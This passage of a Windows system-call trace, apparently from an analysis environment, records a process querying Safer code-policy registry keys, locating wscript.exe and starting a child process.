 01243   456   NtEnumerateKey  (116, 1, Basic, 280, ... ) == STATUS_NO_MORE_ENTRIES
 01244   456   NtClose  (116, ... ) == 0x0
 01245   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01246   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01247   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01248   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01249   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01250   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01251   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01252   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01253   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01254   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01255   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01256   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01257   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01258   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01259   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01260   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01261   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01262   456   NtClose  (116, ... ) == 0x0
 01263   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01264   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01265   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01266   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01267   456   NtClose  (116, ... ) == 0x0
 01268   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01269   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01270   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01271   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01272   456   NtClose  (116, ... ) == 0x0
 01273   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01274   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01275   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01276   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01277   456   NtClose  (116, ... ) == 0x0
 01278   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01279   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01280   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01281   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01282   456   NtClose  (116, ... ) == 0x0
 01283   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01284   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01285   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01286   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01287   456   NtClose  (116, ... ) == 0x0
 01288   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01289   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01290   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01291   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01292   456   NtClose  (116, ... ) == 0x0
 01293   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01294   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01295   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01296   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01297   456   NtClose  (116, ... ) == 0x0
 01298   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01299   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01300   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01301   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01302   456   NtClose  (116, ... ) == 0x0
 01303   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01304   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01305   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01306   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01307   456   NtClose  (116, ... ) == 0x0
 01308   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01309   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01310   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01311   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01312   456   NtClose  (116, ... ) == 0x0
 01313   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01314   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01315   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01316   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01317   456   NtClose  (116, ... ) == 0x0
 01318   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01319   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01320   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01321   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01322   456   NtClose  (116, ... ) == 0x0
 01323   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01324   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01325   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01326   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01327   456   NtClose  (116, ... ) == 0x0
 01328   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01329   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01330   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01331   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01332   456   NtClose  (116, ... ) == 0x0
 01333   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01334   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 116, ) }, ... 116, ) == 0x0
 01335   456   NtQueryValueKey  (116,  (116, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Full, 524, ... TitleIdx=0, Type=4, Name= (116, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Data= (116, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) }, 48, ) == 0x0
 01336   456   NtClose  (116, ... ) == 0x0
 01337   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01338   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01339   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01340   456   NtClose  (116, ... ) == 0x0
 01341   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01342   456   NtOpenThreadToken  (-2, 0x8, 0, ... ) == STATUS_NO_TOKEN
 01343   456   NtOpenProcessToken  (-1, 0xa, ... 116, ) == 0x0
 01344   456   NtDuplicateToken  (116, 0xc, {24, 0, 0x0, 0, 1240788, 0x0}, 0, 2, ... 120, ) == 0x0
 01345   456   NtClose  (116, ... ) == 0x0
 01346   456   NtAccessCheck  (1351152, 120, 0x1, 1240916, 1240860, 56, 1240944, ... (0x1), ) == 0x0
 01347   456   NtClose  (120, ... ) == 0x0
 01348   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 120, ) }, ... 120, ) == 0x0
 01349   456   NtQueryValueKey  (120,  (120, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (120, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01350   456   NtClose  (120, ... ) == 0x0
 01351   456   NtOpenSymbolicLinkObject  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\??\C:"}, ... 120, ) }, ... 120, ) == 0x0
 01352   456   NtQuerySymbolicLinkObject  (120, ...  (120, ... "\Device\HarddiskVolume1", 48, ) , 48, ) == 0x0
 01353   456   NtClose  (120, ... ) == 0x0
 01354   456   NtQueryInformationFile  (96, 1239248, 528, Name, ... {status=0x0, info=62}, ) == 0x0
 01355   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01356   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01357   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 1237928, ... ) }, 1237928, ... ) == 0x0
 01358   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01359   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1,  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01360   456   NtClose  (120, ... ) == 0x0
 01361   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01362   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1,  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1, "System32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 01363   456   NtClose  (120, ... ) == 0x0
 01364   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01365   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1,  (120, 0, 0, 0, 1237288, 616, BothDirectory, 1, "wscript.exe", 0, ... {status=0x0, info=116}, ) , 0, ... {status=0x0, info=116}, ) == 0x0
 01366   456   NtClose  (120, ... ) == 0x0
 01367   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01368   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01369   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01370   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 120, ) == 0x0
 01371   456   NtQueryInformationToken  (120, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01372   456   NtClose  (120, ... ) == 0x0
 01373   456   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 120, ) }, ... 120, ) == 0x0
 01374   456   NtOpenKey  (0x20019, {24, 120, 0x40, 0, 0,  (0x20019, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, ... 116, ) }, ... 116, ) == 0x0
 01375   456   NtClose  (120, ... ) == 0x0
 01376   456   NtQueryValueKey  (116,  (116, "Cache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01377   456   NtQueryValueKey  (116,  (116, "Cache", Partial, 162, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 162, ) , Partial, 162, ... TitleIdx=0, Type=1, Data= (116, "Cache", Partial, 162, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 162, ) }, 162, ) == 0x0
 01378   456   NtClose  (116, ... ) == 0x0
 01379   456   NtAllocateVirtualMemory  (-1, 0, 0, 4096, 8192, 4, ... 9764864, 4096, ) == 0x0
 01380   456   NtAllocateVirtualMemory  (-1, 9764864, 0, 4096, 4096, 4, ... 9764864, 4096, ) == 0x0
 01381   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 116, ) }, ... 116, ) == 0x0
 01382   456   NtQueryValueKey  (116,  (116, "LogFileName", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01383   456   NtClose  (116, ... ) == 0x0
 01384   456   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01385   456   NtQueryInformationToken  (112, User, 128, ... {token info, class 1, size 36}, 36, ) == 0x0
 01386   456   NtQueryInformationToken  (112, 15, 4, ... {token info, class 15, size 4}, 4, ) == 0x0
 01387   456   NtClose  (112, ... ) == 0x0
 01388   456   NtCreateProcessEx  (1243524, 2035711, 0, -1, 0, 100, 0, 0, 0, ... ) == 0x0
 01389   456   NtQueryInformationProcess  (112, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffdf000,AffinityMask=0x1,BasePriority=8,Pid=584,ParentPid=452,}, 0x0, ) == 0x0
 01390   456   NtReadVirtualMemory  (112, 0x7ffdf008, 4, ...  (112, 0x7ffdf008, 4, ... "\0\0@\0", 0x0, ) , 0x0, ) == 0x0
 01391   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01392   456   NtReadVirtualMemory  (112, 0x400000, 4096, ...  (112, 0x400000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\350\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\343\307\212\365\247\246\344\246\247\246\344\246\247\246\344\246$\272\352\246\245\246\344\246\310\271\340\246\245\246\344\246\247\246\344\246\260\246\344\246\361\271\367\246\277\246\344\246\247\246\345\2463\246\344\246\305\271\367\246\252\246\344\246`\240\342\246\246\246\344\246\370\204\357\246\212\246\344\246X\206\340\246\246\246\344\246Rich\247\246\344\246\0\0\0\0\0\0\0\0PE\0\0L\1\4\0\233.9;\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\360\0\0\0\320\0\0\0\0\0\0\20+\0\0\0\20\0\0\0\0\1\0\0\0@\0\0\20\0\0\0\20\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0\320\1\0\0\20\0\0\1\222\2\0\2\0\0\0\0\0\20\0\0\200\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\00\37\1\08\0\0\0P\21\1\0\264\0\0\0\00\1\0\370\223\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\2\1\0\34\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\200\2\0\0\270\0\0\0\0\0\1\0\270\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\326\347\0\0\0\20\0\0\0\360\0\0", 4096, ) , 4096, ) == 0x0
 01393   456   NtReadVirtualMemory  (112, 0x413000, 256, ...  (112, 0x413000, 256, ... "\0\0\0\0\0\0\0\0\0\0\0\0\1\0\4\0\370\5\0\2008\0\0\200\3\0\0\0X\0\0\200\6\0\0\0\250\0\0\200\16\0\0\0(\1\0\200\20\0\0\0X\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\0\0p\1\0\200\2\0\0\0\210\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\1\0\0\0\240\1\0\200\2\0\0\0\270\1\0\200\3\0\0\0\320\1\0\200\4\0\0\0\350\1\0\200\5\0\0\0\0\2\0\200\6\0\0\0\30\2\0\200\7\0\0\00\2\0\200\10\0\0\0H\2\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\16\0\1\0\0\0`\2\0\200\2\0\0\0x\2\0\200\3\0\0\0\220\2\0\200?\0\0\0\250\2\0\200\235\0\0\0\300\2\0\200\236\0\0\0\330\2\0\200\243\0\0\0\360\2\0\200\277\0\0\0\10\3\0\200\302\0\0\0 \3\0\200", 256, ) , 256, ) == 0x0
 01394   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01395   456   NtQueryInformationProcess  (112, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffdf000,AffinityMask=0x1,BasePriority=8,Pid=584,ParentPid=452,}, 0x0, ) == 0x0
 01396   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files"}, 1241588, ... ) }, 1241588, ... ) == 0x0
 01397   456   NtAllocateVirtualMemory  (-1, 0, 0, 1636, 4096, 4, ... 9830400, 4096, ) == 0x0
 01398   456   NtAllocateVirtualMemory  (112, 0, 0, 1910, 4096, 4, ... 65536, 4096, ) == 0x0
 01399   456   NtWriteVirtualMemory  (112, 0x10000,  (112, 0x10000, "=\0:\0:\0=\0:\0:\0\\0\0\0=\0C\0:\0=\0C\0:\0\\0p\0o\0l\0y\0u\0n\0p\0a\0c\0k\0\0\0=\0E\0x\0i\0t\0C\0o\0d\0e\0=\00\00\00\00\00\00\00\02\0\0\0=\0U\0:\0=\0U\0:\0\\0s\0t\0a\0r\0t\0u\0p\0s\0c\0r\0i\0p\0t\0s\0\0\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0A\0P\0P\0D\0A\0T\0A\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0C\0L\0I\0E\0N\0T\0N\0A\0M\0E\0=\0C\0o\0n\0s\0o\0l\0e\0\0\0C\0o\0m\0m\0o\0n\0P\0r\0o\0g\0r\0a\0m\0F\0i\0l\0e\0s\0=\0C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\0\0C\0O\0M\0", 1910, ... 0x0, ) , 1910, ... 0x0, 